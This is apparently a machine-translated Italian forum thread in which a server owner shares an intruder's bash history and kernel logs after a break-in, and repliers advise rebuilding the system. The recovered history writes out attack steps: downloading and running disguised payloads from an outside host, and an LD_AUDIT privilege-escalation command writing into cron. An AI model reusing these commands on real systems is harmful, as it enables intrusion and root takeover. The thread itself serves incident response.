Ubuntu Server hack

Ho guardato netstat e ho notato che qualcuno oltre a me è collegato al server da ssh. Ho preso cura di questo perché il mio utente ha l'unico accesso ssh. Ho trovato questo in un file ftp user.bash_history:

w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd 

Il sistema è in prigione. Va import nel caso in esame? Cosa devo fare?

Grazie per tutti !!

Ho fatto questi: – vietare l'host ssh connesso con iptables – ha arrestato lo sshd nel carcere – salvato: bach_history, syslog, dmesg, file nelle righe wget di bash_history


Ho installato rkhunter e anche unhide. Ho eseguito il command "unhide sys" e ha provocato 1 process nascosto. Ora sto eseguendo rkhunter … OK.

rkhunter -c ha provocato alcuni avvertimenti:

  • nel carcere: Controllo dell'accesso root di SSH [Avviso] Controllo del file di configuration syslog [Avviso]

    Esecuzione di controlli dei file system Controllo di file e directory nascosti [Avviso]

  • Sistema host: esecuzione di controlli dei file system Controllo / dev per tipi di file sospetti [Avviso] Controllo di file e directory nascosti [Avviso]

Ho trovato in dmesg e syslog che l'hacker ha cercato di fare qualcosa con l'irda:

  • syslog:
  Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init ()
 Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: famiglia di protocolli registrati 23
 Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32 (2.6.31: 4726): Unknown cmd fd (0) cmd (ffbb382c) {t: '8'; sz: 16315} arg (00000001) su / dev / pts / 0
 Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Chiamato
 Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
 Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: / home / i è già installato
 Feb 28 22:49:33 kernel i386: [4180218.465341] può: controller area network core (rev 20090105 abi 8)
 Feb 28 22:49:33 kernel i386: [4180218.465413] NET: famiglia di protocolli registrati 29
 Feb 28 22:49:33 kernel i386: [4180218.493398] può: protocollo broadcast manager (rev 20090105 t)
 Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
 Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Chiamato
 Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
 Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: / home / i è già installato
 Feb 28 23:17:01 i386 CRON [10126]: (radice) CMD (cd / && run-parts --report /etc/cron.hourly)
 Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Chiamato
 Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
 Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: / home / i è già installato 
  • dmesg:
  [4180166.230061] irda_init ()
 [4180166.230077] NET: Famiglia di protocollo registrato 23
 [4180171.242169] ioctl32 (2.6.31: 4726): cmd fd (0) cmd (ffbb382c) {t: '8'; sz: 16315} arg (00000001) su / dev / pts / 0
 [4180218.465341] può: area di networking dell'area di controllo (rev 20090105 abi 8)
 [4180218.465413] NET: Famiglia di protocollo registrato 29
 [4180218.493398] può: protocollo broadcast manager (rev 20090105 t)
 [4180894.035222] ip_tables: (C) 2000-2006 Team Netfilter Core 

  • Modifica dei colors terminali in Ubuntu Server
  • a2ensite tramite script shell
  • Problema di installazione del certificato SSL sul server ubuntu
  • Come rendere minima la mia ubuntu installare?
  • Impostazione di un client Linux per OpenLDAP su SSL
  • Come faccio a scoprire il nome host e l'indirizzo IP su Ubuntu?
  • Fail2ban log riempito di voci che dicono "fail2ban.filter: AVVISO IP determinato utilizzando DNS Lookup: .."
  • Dove posso impostare una home directory dell'utente FTP?
  • 2 Solutions collect form web for “Ubuntu Server hack”

    Prendi il tuo sistema verso il basso, ripristina l'analisi per la futura analisi forense, poi ricostruisci da zero e ripristina i dati necessari da un buon backup. Qualcosa di less che lascia la possibilità di utilizzare codice latente dannoso.

    Potresti provare a replicare quello che l'hacker ha fatto e vedere se potrebbe riuscire ad un certo punto (è riuscito a copiare quel file "exploit" negli script cron?). Probabilmente vuoi eseguire rkhunter per verificare se il tuo radice è o no, ma potrebbe hide da qualche altra parte.

    Suggerimenti per Linux e Windows Server, quali Ubuntu, Centos, Apache, Nginx, Debian e argomenti di rete.